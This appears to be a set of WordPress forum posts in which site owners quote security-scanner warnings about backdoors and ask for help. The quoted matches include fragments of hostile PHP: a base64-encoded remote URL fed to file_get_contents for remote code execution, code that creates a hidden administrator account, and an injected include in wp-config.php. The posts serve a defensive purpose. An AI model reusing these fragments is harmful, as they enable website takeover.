On the morning of 16.11. new findings appeared
Critical issues:

• File appears to be suspicious or dangerous: wp-includes/blocks/legacy-widget/.e733b7df.css
• File appears to be suspicious or unsafe: wp-includes/load.php
• File appears to be suspicious or unsafe: index.php

Problems of high severity:

• Unknown file in WordPress core: wp-includes/blocks/legacy-widget/.e733b7df.css
• Modified WordPress core file: index.php
• Modified WordPress core file: wp-includes/load.php

All findings have been removed or corrected.

This morning (18.11.) scan detected 31 findings in which several backdoors were identified.
PHP/lfi.11719
PHP/SerializeIt.A.13398
PHP/commented.13352
PHP/RCE.obfuscated.11616
PHP/commented.13385

Can you advise me how to proceed to get rid of similar attacks? No unwanted activity is visible in activite.log.

Thank you

Lubo?

Ce programme fournit un accès à distance à l’ordinateur sur lequel il est installé.

plugins\itr-popup\scripts\jscolor\itro-admin-scripts.php

If providing the code helps let me know, I made a backup of the file before fixing it.

SUCURI is warning me about a backdoor in this file:
wp-content/plugins/woorewards/include/pointsflow/action.php

Definition: php.backdoor.file_get_contents.005

Looking at the file there is a line which says:
$json = @json_decode(@file_get_contents($_FILES[$key][‘tmp_name’]), true);

Not sure if this is the culprit. Can I place the whole file code in here so you can see if the file is correct?

/mnt/web003/e2/70/511363570/htdocs/floriskleijne.nl/wp-content/cache/supercache/www.floriskleijne.nl/wp-cache-3c685ba0ad8c85ade50e389730ed2748.php

And

/mnt/web003/e2/70/511363570/htdocs/floriskleijne.nl/wp-content/cache/supercache/www.floriskleijne.nl/meta-wp-cache-3c685ba0ad8c85ade50e389730ed2748.php

Backdoor: PHP/PD9.5376 (A backdoor known as PD9).

Is this legit? How can I tell if it’s legit? And how, with WordFence enabled and 2-factor authentication enabled, and strong passwords, did this get into my site?

File Path:
wp-content/plugins/advanced-google-recaptcha/interface/tab_firewall.php

Definition:
php.backdoor.generic-w3.017

Warning: File modified (multiple changes):
./wp-content/plugins/advanced-google-recaptcha/advanced-google-recaptcha.php (old size: 1519; new size: 10300)

Please, find below a message from Wordfence about Backdoor from Slick Popup I am afraid about it because my website was invaded last days ago. I installed all thing again (together new the version Slick Popup PRO), I don’t know if this is a false warnin’:

File Type:?Not a core, theme, or plugin file from www.remarpro.com.

• Details:?This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:?!username_exists($newusername) && !email_exists($newemail) )\x0d\x0a\x09\x09{\x0d\x0a\x09\x09\x09// Create user and set role to administrator\x0d\x0a\x09\x09\x09$user_id = wp_create_user( $newusername, $newpassword, $newemail);\x0d\x0a\x09\x09\x09if ( is_in…
  
  The issue type is:?Backdoor:PHP/createadmin.8711
  Description:?A script used to create admin accounts. This is typically done with malicious intent, but could also be indicative of a vulnerable plugin.

A WordFence scan today found a backdoor on my wp-config.php file:

“Details:?This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:?<?php\x0a/*25733*/\x0a\x0a@include

The issue type is:?Backdoor:PHP/payload.add.11956
Description:?Strange access of internal resources such as malware payloads“

I downloaded the file (VS Code) to search and delete the matched text, but couldn’t find this text. I’ve never edited a wp-config.php file before and would love some help.

Thank you!

• Filename: D:\sites\ifl\wp-content\themes\Divi\includes\block-editor-integration.php
• File Type: Not a core, theme, or plugin file from www.remarpro.com.
• Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: =file_get_contents(base64_decode(“aHR0cDovL2JsbmdibG5ncy5yb2Nrcy9xaWFvL2lmbC5waXR0LnR4dA”));
  
  The issue type is: Backdoor:PHP/rce.decode.10332
  Description: Backdoor – remote code execution malware

My only options are to delete file, view file or mark as fixed

Our security scanner picked up these 2 files in the WooRewards directory. Could you take a look and see if they’re supposed to be there and why they would trigger a ‘backdoor’ warning? (Screenshot included below)

Malware Warnings

File Path: /wp-content/plugins/woorewards/modules/woorewards-pro/include/pointsflow/action.php
Warning: php.backdoor.file_get_contents.005

File Path: /wp-content/plugins/woorewards/modules/woorewards-pro/include/ui/shortcodes/easteregg.php
Warning: php.backdoor.generic.001.19

Thank you,